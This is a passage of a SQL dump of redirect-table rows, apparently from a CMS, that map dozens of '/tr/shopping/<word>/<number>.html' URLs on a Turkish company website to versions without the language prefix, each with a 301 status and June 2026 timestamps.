00:00:00',301),(76811,'https://3s-technologies.com.tr/tr/shopping/ventilating/3599706497.html',NULL,'https://3s-technologies.com.tr/shopping/ventilating/3599706497.html','',1,0,'2026-06-11 09:24:37','0000-00-00 00:00:00',301),(76812,'https://3s-technologies.com.tr/tr/shopping/silicon/600475640.html',NULL,'https://3s-technologies.com.tr/shopping/silicon/600475640.html','',1,0,'2026-06-11 09:24:40','0000-00-00 00:00:00',301),(76813,'https://3s-technologies.com.tr/tr/shopping/stylometer/3482793130.html',NULL,'https://3s-technologies.com.tr/shopping/stylometer/3482793130.html','',1,0,'2026-06-11 09:24:43','0000-00-00 00:00:00',301),(76814,'https://3s-technologies.com.tr/tr/shopping/compromit/1811818224.html',NULL,'https://3s-technologies.com.tr/shopping/compromit/1811818224.html','',1,0,'2026-06-11 09:24:47','0000-00-00 00:00:00',301),(76815,'https://3s-technologies.com.tr/tr/shopping/textbook/441354953.html',NULL,'https://3s-technologies.com.tr/shopping/textbook/441354953.html','',1,0,'2026-06-11 09:24:50','0000-00-00 00:00:00',301),(76816,'https://3s-technologies.com.tr/tr/shopping/fusiform/503315503.html',NULL,'https://3s-technologies.com.tr/shopping/fusiform/503315503.html','',1,0,'2026-06-11 09:24:53','0000-00-00 00:00:00',301),(76817,'https://3s-technologies.com.tr/tr/shopping/squarer/2341197840.html',NULL,'https://3s-technologies.com.tr/shopping/squarer/2341197840.html','',1,0,'2026-06-11 09:24:56','0000-00-00 00:00:00',301),(76818,'https://3s-technologies.com.tr/tr/shopping/plebs/4175004263.html',NULL,'https://3s-technologies.com.tr/shopping/plebs/4175004263.html','',1,0,'2026-06-11 09:24:59','0000-00-00 00:00:00',301),(76819,'https://3s-technologies.com.tr/tr/shopping/fordless/24554612.html',NULL,'https://3s-technologies.com.tr/shopping/fordless/24554612.html','',1,0,'2026-06-11 09:25:02','0000-00-00 00:00:00',301),(76820,'https://3s-technologies.com.tr/tr/shopping/rediva/1672192558.html',NULL,'https://3s-technologies.com.tr/shopping/rediva/1672192558.html','',1,0,'2026-06-11 09:25:05','0000-00-00 00:00:00',301),(76821,'https://3s-technologies.com.tr/tr/shopping/seaware/1861572034.html',NULL,'https://3s-technologies.com.tr/shopping/seaware/1861572034.html','',1,0,'2026-06-11 09:25:08','0000-00-00 00:00:00',301),(76822,'https://3s-technologies.com.tr/tr/shopping/germless/2651030879.html',NULL,'https://3s-technologies.com.tr/shopping/germless/2651030879.html','',1,0,'2026-06-11 09:25:11','0000-00-00 00:00:00',301),(76823,'https://3s-technologies.com.tr/tr/shopping/greenth/1394946405.html',NULL,'https://3s-technologies.com.tr/shopping/greenth/1394946405.html','',1,0,'2026-06-11 09:25:14','0000-00-00 00:00:00',301),(76824,'https://3s-technologies.com.tr/tr/shopping/nonruminant/719976712.html',NULL,'https://3s-technologies.com.tr/shopping/nonruminant/719976712.html','',1,0,'2026-06-11 09:25:17','0000-00-00 00:00:00',301),(76825,'https://3s-technologies.com.tr/tr/shopping/needlework/2498735016.html',NULL,'https://3s-technologies.com.tr/shopping/needlework/2498735016.html','',1,0,'2026-06-11 09:25:20','0000-00-00 00:00:00',301),(76826,'https://3s-technologies.com.tr/tr/shopping/steeped/4064892784.html',NULL,'https://3s-technologies.com.tr/shopping/steeped/4064892784.html','',1,0,'2026-06-11 09:25:23','0000-00-00 00:00:00',301),(76827,'https://3s-technologies.com.tr/tr/shopping/embryotomy/3665980969.html',NULL,'https://3s-technologies.com.tr/shopping/embryotomy/3665980969.html','',1,0,'2026-06-11 09:25:26','0000-00-00 00:00:00',301),(76828,'https://3s-technologies.com.tr/tr/shopping/premial/425212014.html',NULL,'https://3s-technologies.com.tr/shopping/premial/425212014.html','',1,0,'2026-06-11 09:25:29','0000-00-00 00:00:00',301),(76829,'https://3s-technologies.com.tr/tr/shopping/tided/636347186.html',NULL,'https://3s-technologies.com.tr/shopping/tided/636347186.html','',1,0,'2026-06-11 09:25:32','0000-00-00 00:00:00',301),(76830,'https://3s-technologies.com.tr/tr/shopping/whitewasher/3077243765.html',NULL,'https://3s-technologies.com.tr/shopping/whitewasher/3077243765.html','',1,0,'2026-06-11 09:25:35','0000-00-00 00:00:00',301),(76831,'https://3s-technologies.com.tr/tr/shopping/awaygoing/945952982.html',NULL,'https://3s-technologies.com.tr/shopping/awaygoing/945952982.html','',1,0,'2026-06-11 09:25:38','0000-00-00 00:00:00',301),(76832,'https://3s-technologies.com.tr/tr/shopping/throneless/160380458.html',NULL,'https://3s-technologies.com.tr/shopping/throneless/160380458.html','',1,0,'2026-06-11 09:25:41','0000-00-00 00:00:00',301),(76833,'https://3s-technologies.com.tr/tr/shopping/tafia/95645131.html',NULL,'https://3s-technologies.com.tr/shopping/tafia/95645131.html','',1,0,'2026-06-11 09:25:44','0000-00-00 00:00:00',301),(76834,'https://3s-technologies.com.tr/tr/shopping/exagitate/2016457785.html',NULL,'https://3s-technologies.com.tr/shopping/exagitate/2016457785.html','',1,0,'2026-06-11 09:25:47','0000-00-00 00:00:00',301),(76835,'https://3s-technologies.com.tr/tr/shopping/analogical/3299983014.html',NULL,'https://3s-technologies.com.tr/shopping/analogical/3299983014.html','',1,0,'2026-06-11 09:25:51','0000-00-00 00:00:00',301),(76836,'https://3s-technologies.com.tr/tr/shopping/halflength/4021494118.html',NULL,'https://3s-technologies.com.tr/shopping/halflength/4021494118.html','',1,0,'2026-06-11 09:25:54','0000-00-00 00:00:00',301),(76837,'https://3s-technologies.com.tr/tr/shopping/synangium/604457295.html',NULL,'https://3s-technologies.com.tr/shopping/synangium/604457295.html','',1,0,'2026-06-11 09:25:57','0000-00-00 00:00:00',301),(76838,'https://3s-technologies.com.tr/tr/shopping/joyous/89680721.html',NULL,'https://3s-technologies.com.tr/shopping/joyous/89680721.html','',1,0,'2026-06-11 09:26:00','0000-00-00 00:00:00',301),(76839,'https://3s-technologies.com.tr/tr/shopping/errand/2585904786.html',NULL,'https://3s-technologies.com.tr/shopping/errand/2585904786.html','',1,0,'2026-06-11 09:26:03','0000-00-00 00:00:00',301),(76840,'https://3s-technologies.com.tr/tr/shopping/roodebok/2031830068.html',NULL,'https://3s-technologies.com.tr/shopping/roodebok/2031830068.html','',1,0,'2026-06-11 09:26:06','0000-00-00 00:00:00',301),(76841,'https://3s-technologies.com.tr/tr/shopping/underchamberlain/467443957.html',NULL,'https://3s-technologies.com.tr/shopping/underchamberlain/467443957.html','',1,0,'2026-06-11 09:26:09','0000-00-00 00:00:00',301),(76842,'https://3s-technologies.com.tr/tr/shopping/freeheartedly/2394587947.html',NULL,'https://3s-technologies.com.tr/shopping/freeheartedly/2394587947.html','',1,0,'2026-06-11 09:26:12','0000-00-00 00:00:00',301),(76843,'https://3s-technologies.com.tr/tr/shopping/entortilation/4180968689.html',NULL,'https://3s-technologies.com.tr/shopping/entortilation/4180968689.html','',1,0,'2026-06-11 09:26:15','0000-00-00 00:00:00',301),(76844,'https://3s-technologies.com.tr/tr/shopping/hemigamous/696657264.html',NULL,'https://3s-technologies.com.tr/shopping/hemigamous/696657264.html','',1,0,'2026-06-11 09:26:18','0000-00-00 00:00:00',301),(76845,'https://3s-technologies.com.tr/tr/shopping/clumps/3897454935.html',NULL,'https://3s-technologies.com.tr/shopping/clumps/3897454935.html','',1,0,'2026-06-11 09:26:21','0000-00-00 00:00:00',301),(76846,'https://3s-technologies.com.tr/tr/shopping/questioner/3194320655.html',NULL,'https://3s-technologies.com.tr/shopping/questioner/3194320655.html','',1,0,'2026-06-11 09:26:24','0000-00-00 00:00:00',301),(76847,'https://3s-technologies.com.tr/tr/shopping/syngraph/4289538824.html',NULL,'https://3s-technologies.com.tr/shopping/syngraph/4289538824.html','',1,0,'2026-06-11 09:26:27','0000-00-00 00:00:00',301),(76848,'https://3s-technologies.com.tr/tr/shopping/enchanted/1769586249.html',NULL,'https://3s-technologies.com.tr/shopping/enchanted/1769586249.html','',1,0,'2026-06-11 09:26:30','0000-00-00 00:00:00',301),(76849,'https://3s-technologies.com.tr/tr/shopping/gladiatorian/2053937433.html',NULL,'https://3s-technologies.com.tr/shopping/gladiatorian/2053937433.html','',1,0,'2026-06-11 09:26:33','0000-00-00 00:00:00',301),(76850,'https://3s-technologies.com.tr/tr/shopping/pignora/971878479.html',NULL,'https://3s-technologies.com.tr/shopping/pignora/971878479.html','',1,0,'2026-06-11 09:26:36','0000-00-00 00:00:00',301),(76851,'https://3s-technologies.com.tr/tr/shopping/considerably/3674206054.html',NULL,'https://3s-technologies.com.tr/shopping/considerably/3674206054.html','',1,0,'2026-06-11 09:26:39','0000-00-00 00:00:00',301),(76852,'https://3s-technologies.com.tr/tr/shopping/alkalinity/1434194640.html',NULL,'https://3s-technologies.com.tr/shopping/alkalinity/1434194640.html','',1,0,'2026-06-11 09:26:42','0000-00-00 00:00:00',301),(76853,'https://3s-technologies.com.tr/tr/shopping/splotchy/3946863419.html',NULL,'https://3s-technologies.com.tr/shopping/splotchy/3946863419.html','',1,0,'2026-06-11 09:26:45','0000-00-00 00:00:00',301),(76854,'https://3s-technologies.com.tr/tr/shopping/earmark/1586326948.html',NULL,'https://3s-technologies.com.tr/shopping/earmark/1586326948.html','',1,0,'2026-06-11 09:26:47','0000-00-00 00:00:00',301),(76855,'https://3s-technologies.com.tr/tr/shopping/decamp/3995405114.html',NULL,'https://3s-technologies.com.tr/shopping/decamp/3995405114.html','',1,0,'2026-06-11 09:26:51','0000-00-00 00:00:00',301),(76856,'https://3s-technologies.com.tr/tr/shopping/misborn/2342573446.html',NULL,'https://3s-technologies.com.tr/shopping/misborn/2342573446.html','',1,0,'2026-06-11 09:26:56','0000-00-00 00:00:00',301),(76857,'https://3s-technologies.com.tr/tr/shopping/countreplete/3314143214.html',NULL,'https://3s-technologies.com.tr/shopping/countreplete/3314143214.html','',1,0,'2026-06-11 09:26:58','0000-00-00 00:00:00',301),(76858,'https://3s-technologies.com.tr/tr/shopping/meracious/2530577300.html',NULL,'https://3s-technologies.com.tr/shopping/meracious/2530577300.html','',1,0,'2026-06-11 09:27:01','0000-00-00 00:00:00',301),(76859,'https://3s-technologies.com.tr/tr/shopping/fourposter/1841629259.html',NULL,'https://3s-technologies.com.tr/shopping/fourposter/1841629259.html','',1,0,'2026-06-11 09:27:04','0000-00-00 00:00:00',301),(76860,'https://3s-technologies.com.tr/tr/shopping/swordplay/825499435.html',NULL,'https://3s-technologies.com.tr/shopping/swordplay/825499435.html','',1,0,'2026-06-11 09:27:07','0000-00-00 00:00:00',301),(76861,'https://3s-technologies.com.tr/tr/shopping/oldmanofthewoods/3676534167.html',NULL,'https://3s-technologies.com.tr/shopping/oldmanofthewoods/3676534167.html','',1,0,'2026-06-11 09:27:13','0000-00-00 00:00:00',301),(76862,'https://3s-technologies.com.tr/tr/shopping/hulking/3262995486.html',NULL,'https://3s-technologies.com.tr/shopping/hulking/3262995486.html','',1,0,'2026-06-11 09:27:17','0000-00-00 00:00:00',301),(76863,'https://3s-technologies.com.tr/tr/shopping/disillusioning/1980813482.html',NULL,'https://3s-technologies.com.tr/shopping/disillusioning/1980813482.html','',1,0,'2026-06-11 09:27:20','0000-00-00 00:00:00',301),(76864,'https://3s-technologies.com.tr/tr/shopping/deliciously/818322926.html',NULL,'https://3s-technologies.com.tr/shopping/deliciously/818322926.html','',1,0,'2026-06-11 09:27:23','0000-00-00 00:00:00',301),(76865,'https://3s-technologies.com.tr/tr/shopping/genetic/758176355.html',NULL,'https://3s-technologies.com.tr/shopping/genetic/758176355.html','',1,0,'2026-06-11 09:27:26','0000-00-00 00:00:00',301),(76866,'https://3s-technologies.com.tr/tr/shopping/meloid/2177300219.html',NULL,'https://3s-technologies.com.tr/shopping/meloid/2177300219.html','',1,0,'2026-06-11 09:27:29','0000-00-00 00:00:00',301),(76867,'https://3s-technologies.com.tr/tr/shopping/onesidedness/2741485261.html',NULL,'https://3s-technologies.com.tr/shopping/onesidedness/2741485261.html','',1,0,'2026-06-11 09:27:32','0000-00-00 00:00:00',301),(76868,'https://3s-technologies.com.tr/tr/shopping/berrying/1808181911.html',NULL,'https://3s-technologies.com.tr/shopping/berrying/1808181911.html','',1,0,'2026-06-11 09:27:35','0000-00-00 00:00:00',301),(76869,'https://3s-technologies.com.tr/tr/shopping/waged/1043739638.html',NULL,'https://3s-technologies.com.tr/shopping/waged/1043739638.html','',1,0,'2026-06-11 09:27:38','0000-00-00 00:00:00',301),(76870,'https://3s-technologies.com.tr/tr/shopping/avowtry/4141947697.html',NULL,'https://3s-technologies.com.tr/shopping/avowtry/4141947697.html','',1,0,'2026-06-11 09:27:41','0000-00-00 00:00:00',301),(76871,'https://3s-technologies.com.tr/tr/shopping/erythromannite/3203661738.html',NULL,'https://3s-technologies.com.tr/shopping/erythromannite/3203661738.html','',1,0,'2026-06-11 09:27:44','0000-00-00 00:00:00',301),(76872,'https://3s-technologies.com.tr/tr/shopping/brier/3997569704.html',NULL,'https://3s-technologies.com.tr/shopping/brier/3997569704.html','',1,0,'2026-06-11 09:27:47','0000-00-00 00:00:00',301),(76873,'https://3s-technologies.com.tr/tr/shopping/choltry/1864948707.html',NULL,'https://3s-technologies.com.tr/shopping/choltry/1864948707.html','',1,0,'2026-06-11 09:27:50','0000-00-00 00:00:00',301),(76874,'https://3s-technologies.com.tr/tr/shopping/inoculable/2804446764.html',NULL,'https://3s-technologies.com.tr/shopping/inoculable/2804446764.html','',1,0,'2026-06-11 09:27:53','0000-00-00 00:00:00',301),(76875,'https://3s-technologies.com.tr/tr/shopping/troublesomely/19802317.html',NULL,'https://3s-technologies.com.tr/shopping/troublesomely/19802317.html','',1,0,'2026-06-11 09:27:56','0000-00-00 00:00:00',301),(76876,'https://3s-technologies.com.tr/tr/shopping/aphthoid/1715029467.html',NULL,'https://3s-technologies.com.tr/shopping/aphthoid/1715029467.html','',1,0,'2026-06-11 09:27:59','0000-00-00 00:00:00',301),(76877,'https://3s-technologies.com.tr/tr/shopping/septula/396744220.html',NULL,'https://3s-technologies.com.tr/shopping/septula/396744220.html','',1,0,'2026-06-11 09:28:02','0000-00-00 00:00:00',301),(76878,'https://3s-technologies.com.tr/tr/shopping/culled/1400747308.html',NULL,'https://3s-technologies.com.tr/shopping/culled/1400747308.html','',1,0,'2026-06-11 09:28:05','0000-00-00 00:00:00',301),(76879,'https://3s-technologies.com.tr/tr/shopping/numps/2995600080.html',NULL,'https://3s-technologies.com.tr/shopping/numps/2995600080.html','',1,0,'2026-06-11 09:28:08','0000-00-00 00:00:00',301),(76880,'https://3s-technologies.com.tr/tr/shopping/pelfray/4053338601.html',NULL,'https://3s-technologies.com.tr/shopping/pelfray/4053338601.html','',1,0,'2026-06-11 09:28:11','0000-00-00 00:00:00',301),(76881,'https://3s-technologies.com.tr/tr/shopping/synod/1080966005.html',NULL,'https://3s-technologies.com.tr/shopping/synod/1080966005.html','',1,0,'2026-06-11 09:28:14','0000-00-00 00:00:00',301),(76882,'https://3s-technologies.com.tr/tr/shopping/indart/699081446.html',NULL,'https://3s-technologies.com.tr/shopping/indart/699081446.html','',1,0,'2026-06-11 09:28:19','0000-00-00 00:00:00',301),(76883,'https://3s-technologies.com.tr/tr/shopping/abscind/9249119.html',NULL,'https://3s-technologies.com.tr/shopping/abscind/9249119.html','',1,0,'2026-06-11 09:28:23','0000-00-00 00:00:00',301),(76884,'https://3s-technologies.com.tr/tr/shopping/imaginer/558243697.html',NULL,'https://3s-technologies.com.tr/shopping/imaginer/558243697.html','',1,0,'2026-06-11 09:28:26','0000-00-00 00:00:00',301),(76885,'https://3s-technologies.com.tr/tr/shopping/craps/2461910995.html',NULL,'https://3s-technologies.com.tr/shopping/craps/2461910995.html','',1,0,'2026-06-11 09:28:29','0000-00-00 00:00:00',301),(76886,'https://3s-technologies.com.tr/tr/shopping/compatient/1280639087.html',NULL,'https://3s-technologies.com.tr/shopping/compatient/1280639087.html','',1,0,'2026-06-11 09:28:32','0000-00-00 00:00:00',301),(76887,'https://3s-technologies.com.tr/tr/shopping/ostman/330242489.html',NULL,'https://3s-technologies.com.tr/shopping/ostman/330242489.html','',1,0,'2026-06-11 09:28:35','0000-00-00 00:00:00',301),(76888,'https://3s-technologies.com.tr/tr/shopping/gutturally/2322285345.html',NULL,'https://3s-technologies.com.tr/shopping/gutturally/2322285345.html','',1,0,'2026-06-11 09:28:40','0000-00-00 00:00:00',301),(76889,'https://3s-technologies.com.tr/tr/shopping/propulsion/2910921946.html',NULL,'https://3s-technologies.com.tr/shopping/propulsion/2910921946.html','',1,0,'2026-06-11 09:28:43','0000-00-00 00:00:00',301),(76890,'https://3s-technologies.com.tr/tr/shopping/eavedrop/724565516.html',NULL,'https://3s-technologies.com.tr/shopping/eavedrop/724565516.html','',1,0,'2026-06-11 09:28:46','0000-00-00 00:00:00',301),(76891,'https://3s-technologies.com.tr/tr/shopping/stalactitical/70768226.html',NULL,'https://3s-technologies.com.tr/shopping/stalactitical/70768226.html','',1,0,'2026-06-11 09:28:49','0000-00-00 00:00:00',301),(76892,'https://3s-technologies.com.tr/tr/shopping/hayward/1751626245.html',NULL,'https://3s-technologies.com.tr/shopping/hayward/1751626245.html','',1,0,'2026-06-11 09:28:52','0000-00-00 00:00:00',301),(76893,'https://3s-technologies.com.tr/tr/shopping/eschevin/2852597725.html',NULL,'https://3s-technologies.com.tr/shopping/eschevin/2852597725.html','',1,0,'2026-06-11 09:28:55','0000-00-00 00:00:00',301),(76894,'https://3s-technologies.com.tr/tr/shopping/dermopathic/4001206017.html',NULL,'https://3s-technologies.com.tr/shopping/dermopathic/4001206017.html','',1,0,'2026-06-11 09:28:58','0000-00-00 00:00:00',301),(76895,'https://3s-technologies.com.tr/tr/shopping/incised/969454265.html',NULL,'https://3s-technologies.com.tr/shopping/incised/969454265.html','',1,0,'2026-06-11 09:29:01','0000-00-00 00:00:00',301),(76896,'https://3s-technologies.com.tr/tr/shopping/aurate/162968179.html',NULL,'https://3s-technologies.com.tr/shopping/aurate/162968179.html','',1,0,'2026-06-11 09:29:04','0000-00-00 00:00:00',301),(76897,'https://3s-technologies.com.tr/tr/shopping/counterstep/1464661286.html',NULL,'https://3s-technologies.com.tr/shopping/counterstep/1464661286.html','',1,0,'2026-06-11 09:29:07','0000-00-00 00:00:00',301),(76898,'https://3s-technologies.com.tr/tr/shopping/absurd/788643017.html',NULL,'https://3s-technologies.com.tr/shopping/absurd/788643017.html','',1,0,'2026-06-11 09:29:10','0000-00-00 00:00:00',301),(76899,'https://3s-technologies.com.tr/tr/shopping/batty/3556080620.html',NULL,'https://3s-technologies.com.tr/shopping/batty/3556080620.html','',1,0,'2026-06-11 09:29:13','0000-00-00 00:00:00',301),(76900,'https://3s-technologies.com.tr/tr/shopping/warmness/1205957695.html',NULL,'https://3s-technologies.com.tr/shopping/warmness/1205957695.html','',1,0,'2026-06-11 09:29:16','0000-00-00 00:00:00',301),(76901,'https://3s-technologies.com.tr/tr/shopping/eightscore/3081996092.html',NULL,'https://3s-technologies.com.tr/shopping/eightscore/3081996092.html','',1,0,'2026-06-11 09:29:19','0000-00-00 00:00:00',301),(76902,'https://3s-technologies.com.tr/tr/shopping/chondrification/1245979640.html',NULL,'https://3s-technologies.com.tr/shopping/chondrification/1245979640.html','',1,0,'2026-06-11 09:29:22','0000-00-00 00:00:00',301),(76903,'https://3s-technologies.com.tr/tr/shopping/dolent/592510163.html',NULL,'https://3s-technologies.com.tr/shopping/dolent/592510163.html','',1,0,'2026-06-11 09:29:25','0000-00-00 00:00:00',301),(76904,'https://3s-technologies.com.tr/tr/shopping/perishably/4251895653.html',NULL,'https://3s-technologies.com.tr/shopping/perishably/4251895653.html','',1,0,'2026-06-11 09:29:30','0000-00-00 00:00:00',301),(76905,'https://3s-technologies.com.tr/tr/shopping/engagingness/4028461712.html',NULL,'https://3s-technologies.com.tr/shopping/engagingness/4028461712.html','',1,0,'2026-06-11 09:29:33','0000-00-00 00:00:00',301),(76906,'https://3s-technologies.com.tr/tr/shopping/sorbent/3246592923.html',NULL,'https://3s-technologies.com.tr/shopping/sorbent/3246592923.html','',1,0,'2026-06-11 09:29:36','0000-00-00 00:00:00',301),(76907,'https://3s-technologies.com.tr/tr/shopping/makebelief/477390006.html',NULL,'https://3s-technologies.com.tr/shopping/makebelief/477390006.html','',1,0,'2026-06-11 09:29:39','0000-00-00 00:00:00',301),(76908,'https://3s-technologies.com.tr/tr/shopping/tharos/2785274645.html',NULL,'https://3s-technologies.com.tr/shopping/tharos/2785274645.html','',1,0,'2026-06-11 09:29:42','0000-00-00 00:00:00',301),(76909,'https://3s-technologies.com.tr/tr/shopping/jointure/3728548668.html',NULL,'https://3s-technologies.com.tr/shopping/jointure/3728548668.html','',1,0,'2026-06-11 09:29:45','0000-00-00 00:00:00',301),(76910,'https://3s-technologies.com.tr/tr/shopping/laocoon/3238463907.html',NULL,'https://3s-technologies.com.tr/shopping/laocoon/3238463907.html','',1,0,'2026-06-11 09:29:48','0000-00-00 00:00:00',301),(76911,'https://3s-technologies.com.tr/tr/shopping/luzula/1574772797.html',NULL,'https://3s-technologies.com.tr/shopping/luzula/1574772797.html','',1,0,'2026-06-11 09:29:51','0000-00-00 00:00:00',301),(76912,'https://3s-technologies.com.tr/tr/shopping/scorpene/2891845928.html',NULL,'https://3s-technologies.com.tr/shopping/scorpene/2891845928.html','',1,0,'2026-06-11 09:29:54','0000-00-00 00:00:00',301),(76913,'https://3s-technologies.com.tr/tr/shopping/endanger/1893416501.html',NULL,'https://3s-technologies.com.tr/shopping/endanger/1893416501.html','',1,0,'2026-06-11 09:29:57','0000-00-00 00:00:00',301),(76914,'https://3s-technologies.com.tr/tr/shopping/personeity/3976674438.html',NULL,'https://3s-technologies.com.tr/shopping/personeity/3976674438.html','',1,0,'2026-06-11 09:30:00','0000-00-00 00:00:00',301),(76915,'https://3s-technologies.com.tr/tr/shopping/echoes/2658207388.html',NULL,'https://3s-technologies.com.tr/shopping/echoes/2658207388.html','',1,0,'2026-06-11 09:30:03','0000-00-00 00:00:00',301),(76916,'https://3s-technologies.com.tr/tr/shopping/regressing/278669431.html',NULL,'https://3s-technologies.com.tr/shopping/regressing/278669431.html','',1,0,'2026-06-11 09:30:06','0000-00-00 00:00:00',301),(76917,'https://3s-technologies.com.tr/tr/shopping/humanities/941200687.html',NULL,'https://3s-technologies.com.tr/shopping/humanities/941200687.html','',1,0,'2026-06-11 09:30:09','0000-00-00 00:00:00',301),(76918,'https://3s-technologies.com.tr/tr/shopping/nationalization/4172839673.html',NULL,'https://3s-technologies.com.tr/shopping/nationalization/4172839673.html','',1,0,'2026-06-11 09:30:12','0000-00-00 00:00:00',301),(76919,'https://3s-technologies.com.tr/tr/shopping/abrood/4047537730.html',NULL,'https://3s-technologies.com.tr/shopping/abrood/4047537730.html','',1,0,'2026-06-11 09:30:15','0000-00-00 00:00:00',301),(76920,'https://3s-technologies.com.tr/tr/shopping/georychus/1662851443.html',NULL,'https://3s-technologies.com.tr/shopping/georychus/1662851443.html','',1,0,'2026-06-11 09:30:20','0000-00-00 00:00:00',301),(76921,'https://3s-technologies.com.tr/tr/shopping/heptane/3280695866.html',NULL,'https://3s-technologies.com.tr/shopping/heptane/3280695866.html','',1,0,'2026-06-11 09:30:21','0000-00-00 00:00:00',301),(76922,'https://3s-technologies.com.tr/tr/shopping/bhang/1888827729.html',NULL,'https://3s-technologies.com.tr/shopping/bhang/1888827729.html','',1,0,'2026-06-11 09:30:24','0000-00-00 00:00:00',301),(76923,'https://3s-technologies.com.tr/tr/shopping/essenced/1283063269.html',NULL,'https://3s-technologies.com.tr/shopping/essenced/1283063269.html','',1,0,'2026-06-11 09:30:28','0000-00-00 00:00:00',301),(76924,'https://3s-technologies.com.tr/tr/shopping/otides/1986614385.html',NULL,'https://3s-technologies.com.tr/shopping/otides/1986614385.html','',1,0,'2026-06-11 09:30:30','0000-00-00 00:00:00',301),(76925,'https://3s-technologies.com.tr/tr/shopping/paler/327818291.html',NULL,'https://3s-technologies.com.tr/shopping/paler/327818291.html','',1,0,'2026-06-11 09:30:33','0000-00-00 00:00:00',301),(76926,'https://3s-technologies.com.tr/tr/shopping/amiss/1691709987.html',NULL,'https://3s-technologies.com.tr/shopping/amiss/1691709987.html','',1,0,'2026-06-11 09:30:36','0000-00-00 00:00:00',301),(76927,'https://3s-technologies.com.tr/tr/shopping/agrostologic/1177704085.html',NULL,'https://3s-technologies.com.tr/shopping/agrostologic/1177704085.html','',1,0,'2026-06-11 09:30:39','0000-00-00 00:00:00',301),(76928,'https://3s-technologies.com.tr/tr/shopping/physopoda/1324083129.html',NULL,'https://3s-technologies.com.tr/shopping/physopoda/1324083129.html','',1,0,'2026-06-11 09:30:42','0000-00-00 00:00:00',301),(76929,'https://3s-technologies.com.tr/tr/shopping/almonry/3030259495.html',NULL,'https://3s-technologies.com.tr/shopping/almonry/3030259495.html','',1,0,'2026-06-11 09:30:45','0000-00-00 00:00:00',301),(76930,'https://3s-technologies.com.tr/tr/shopping/dunter/1496928900.html',NULL,'https://3s-technologies.com.tr/shopping/dunter/1496928900.html','',1,0,'2026-06-11 09:30:48','0000-00-00 00:00:00',301),(76931,'https://3s-technologies.com.tr/tr/shopping/stagecoachmen/4098340100.html',NULL,'https://3s-technologies.com.tr/shopping/stagecoachmen/4098340100.html','',1,0,'2026-06-11 09:30:51','0000-00-00 00:00:00',301),(76932,'https://3s-technologies.com.tr/tr/shopping/accusatorial/3943227122.html',NULL,'https://3s-technologies.com.tr/shopping/accusatorial/3943227122.html','',1,0,'2026-06-11 09:30:54','0000-00-00 00:00:00',301),(76933,'https://3s-technologies.com.tr/tr/shopping/reaver/474802301.html',NULL,'https://3s-technologies.com.tr/shopping/reaver/474802301.html','',1,0,'2026-06-11 09:30:57','0000-00-00 00:00:00',301),(76934,'https://3s-technologies.com.tr/tr/shopping/nitroglycerin/2123815853.html',NULL,'https://3s-technologies.com.tr/shopping/nitroglycerin/2123815853.html','',1,0,'2026-06-11 09:31:00','0000-00-00 00:00:00',301),(76935,'https://3s-technologies.com.tr/tr/shopping/triarticulate/216098678.html',NULL,'https://3s-technologies.com.tr/shopping/triarticulate/216098678.html','',1,0,'2026-06-11 09:31:03','0000-00-00 00:00:00',301),(76936,'https://3s-technologies.com.tr/tr/shopping/hallstattian/2016294262.html',NULL,'https://3s-technologies.com.tr/shopping/hallstattian/2016294262.html','',1,0,'2026-06-11 09:31:06','0000-00-00 00:00:00',301),(76937,'https://3s-technologies.com.tr/tr/shopping/isothere/4076658081.html',NULL,'https://3s-technologies.com.tr/shopping/isothere/4076658081.html','',1,0,'2026-06-11 09:31:09','0000-00-00 00:00:00',301),(76938,'https://3s-technologies.com.tr/tr/shopping/spadefish/3602294202.html',NULL,'https://3s-technologies.com.tr/shopping/spadefish/3602294202.html','',1,0,'2026-06-11 09:31:12','0000-00-00 00:00:00',301),(76939,'https://3s-technologies.com.tr/tr/shopping/conical/1247191755.html',NULL,'https://3s-technologies.com.tr/shopping/conical/1247191755.html','',1,0,'2026-06-11 09:31:15','0000-00-00 00:00:00',301),(76940,'https://3s-technologies.com.tr/tr/shopping/motorless/865307196.html',NULL,'https://3s-technologies.com.tr/shopping/motorless/865307196.html','',1,0,'2026-06-11 09:31:18','0000-00-00 00:00:00',301),(76941,'https://3s-technologies.com.tr/tr/shopping/ripply/3518017560.html',NULL,'https://3s-technologies.com.tr/shopping/ripply/3518017560.html','',1,0,'2026-06-11 09:31:23','0000-00-00 00:00:00',301),(76942,'https://3s-technologies.com.tr/tr/shopping/cooing/2777889409.html',NULL,'https://3s-technologies.com.tr/shopping/cooing/2777889409.html','',1,0,'2026-06-11 09:31:28','0000-00-00 00:00:00',301),(76943,'https://3s-technologies.com.tr/tr/shopping/swooped/2741065388.html',NULL,'https://3s-technologies.com.tr/shopping/swooped/2741065388.html','',1,0,'2026-06-11 09:31:31','0000-00-00 00:00:00',301),(76944,'https://3s-technologies.com.tr/tr/shopping/conjector/681913668.html',NULL,'https://3s-technologies.com.tr/shopping/conjector/681913668.html','',1,0,'2026-06-11 09:31:34','0000-00-00 00:00:00',301),(76945,'https://3s-technologies.com.tr/tr/shopping/improvisate/1071409852.html',NULL,'https://3s-technologies.com.tr/shopping/improvisate/1071409852.html','',1,0,'2026-06-11 09:31:37','0000-00-00 00:00:00',301),(76946,'https://3s-technologies.com.tr/tr/shopping/believed/660199252.html',NULL,'https://3s-technologies.com.tr/shopping/believed/660199252.html','',1,0,'2026-06-11 09:31:40','0000-00-00 00:00:00',301),(76947,'https://3s-technologies.com.tr/tr/shopping/sleave/3221296145.html',NULL,'https://3s-technologies.com.tr/shopping/sleave/3221296145.html','',1,0,'2026-06-11 09:31:43','0000-00-00 00:00:00',301),(76948,'https://3s-technologies.com.tr/tr/shopping/wellread/1826885679.html',NULL,'https://3s-technologies.com.tr/shopping/wellread/1826885679.html','',1,0,'2026-06-11 09:31:46','0000-00-00 00:00:00',301),(76949,'https://3s-technologies.com.tr/tr/shopping/temptationless/3340419478.html',NULL,'https://3s-technologies.com.tr/shopping/temptationless/3340419478.html','',1,0,'2026-06-11 09:31:49','0000-00-00 00:00:00',301),(76950,'https://3s-technologies.com.tr/tr/shopping/whereform/3916929375.html',NULL,'https://3s-technologies.com.tr/shopping/whereform/3916929375.html','',1,0,'2026-06-11 09:31:52','0000-00-00 00:00:00',301),(76951,'https://3s-technologies.com.tr/tr/shopping/soreness/3986807763.html',NULL,'https://3s-technologies.com.tr/shopping/soreness/3986807763.html','',1,0,'2026-06-11 09:31:55','0000-00-00 00:00:00',301),(76952,'https://3s-technologies.com.tr/tr/shopping/inconditional/1052497357.html',NULL,'https://3s-technologies.com.tr/shopping/inconditional/1052497357.html','',1,0,'2026-06-11 09:31:58','0000-00-00 